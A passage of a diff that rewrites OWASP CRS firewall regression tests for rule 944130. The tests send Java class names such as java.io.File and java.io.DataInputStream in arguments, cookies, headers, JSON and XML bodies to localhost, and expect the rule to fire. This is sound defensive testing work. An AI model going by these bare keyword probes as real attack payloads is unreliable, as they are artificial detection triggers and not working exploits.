"{\"java.io.ByteArrayOutputStream\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-67 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.io.ByteArrayOutputStream\": \"test\"}" + output: + log: + expect_ids: [944130] + - test_id: 67 desc: "Argument test includes keyword java.io.CharArrayReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.CharArrayReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-68 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.CharArrayReader" + output: + log: + expect_ids: [944130] + - test_id: 68 desc: "Argument name includes keyword java.io.CharArrayReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.CharArrayReader=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-69 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.CharArrayReader=test" + output: + log: + expect_ids: [944130] + - test_id: 69 desc: "Cookie test includes keyword java.io.CharArrayReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.CharArrayReader - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-70 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.CharArrayReader + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - 
test_id: 70 desc: "Cookie name includes keyword java.io.CharArrayReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.CharArrayReader=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-71 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.CharArrayReader=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 71 desc: "Request header test includes keyword java.io.CharArrayReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.CharArrayReader - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-72 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: 
"gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.CharArrayReader + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 72 desc: "XML attribute value includes keyword java.io.CharArrayReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-73 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944130] + - test_id: 73 desc: "XML element value includes keyword java.io.CharArrayReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.CharArrayReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-74 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.CharArrayReader" + output: + log: + expect_ids: [944130] + - test_id: 74 desc: "Nested XML element value includes keyword java.io.CharArrayReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.CharArrayReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-75 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.CharArrayReader" + output: + log: + expect_ids: [944130] + - test_id: 75 desc: "Content-Type text/plain includes keyword java.io.CharArrayReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.CharArrayReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-76 + - input: + 
dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.CharArrayReader" + output: + log: + expect_ids: [944130] + - test_id: 76 desc: "Content-Type application/json arg value includes keyword java.io.CharArrayReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.CharArrayReader\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-77 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.CharArrayReader\"}" + output: + log: + expect_ids: [944130] + - test_id: 77 desc: "Content-Type application/json arg name includes keyword java.io.CharArrayReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: 
"application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.io.CharArrayReader\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-78 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.io.CharArrayReader\": \"test\"}" + output: + log: + expect_ids: [944130] + - test_id: 78 desc: "Argument test includes keyword java.io.DataInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.DataInputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-79 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.DataInputStream" + output: + log: + expect_ids: [944130] + - test_id: 79 desc: "Argument name includes keyword java.io.DataInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.DataInputStream=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-80 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.DataInputStream=test" + output: + log: + expect_ids: [944130] + - test_id: 80 desc: "Cookie test includes keyword java.io.DataInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.DataInputStream - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-81 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.DataInputStream + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - 
test_id: 81 desc: "Cookie name includes keyword java.io.DataInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.DataInputStream=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-82 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.DataInputStream=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 82 desc: "Request header test includes keyword java.io.DataInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.DataInputStream - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-83 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: 
"gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.DataInputStream + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 83 desc: "XML attribute value includes keyword java.io.DataInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-84 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944130] + - test_id: 84 desc: "XML element value includes keyword java.io.DataInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.DataInputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-85 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.DataInputStream" + output: + log: + expect_ids: [944130] + - test_id: 85 desc: "Nested XML element value includes keyword java.io.DataInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.DataInputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-86 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.DataInputStream" + output: + log: + expect_ids: [944130] + - test_id: 86 desc: "Content-Type text/plain includes keyword java.io.DataInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.DataInputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-87 + - input: + 
dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.DataInputStream" + output: + log: + expect_ids: [944130] + - test_id: 87 desc: "Content-Type application/json arg value includes keyword java.io.DataInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.DataInputStream\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-88 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.DataInputStream\"}" + output: + log: + expect_ids: [944130] + - test_id: 88 desc: "Content-Type application/json arg name includes keyword java.io.DataInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: 
"application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.io.DataInputStream\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-89 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.io.DataInputStream\": \"test\"}" + output: + log: + expect_ids: [944130] + - test_id: 89 desc: "Argument test includes keyword java.io.File" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.File" - output: - log_contains: "id \"944130\"" - - test_title: 944130-90 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.File" + output: + log: + expect_ids: [944130] + - test_id: 90 desc: "Argument name includes keyword java.io.File" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.File=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-91 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.File=test" + output: + log: + expect_ids: [944130] + - test_id: 91 desc: "Cookie test includes keyword java.io.File" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.File - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-92 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.File + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 92 desc: "Cookie name includes keyword 
java.io.File" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.File=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-93 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.File=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 93 desc: "Request header test includes keyword java.io.File" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.File - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-94 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + 
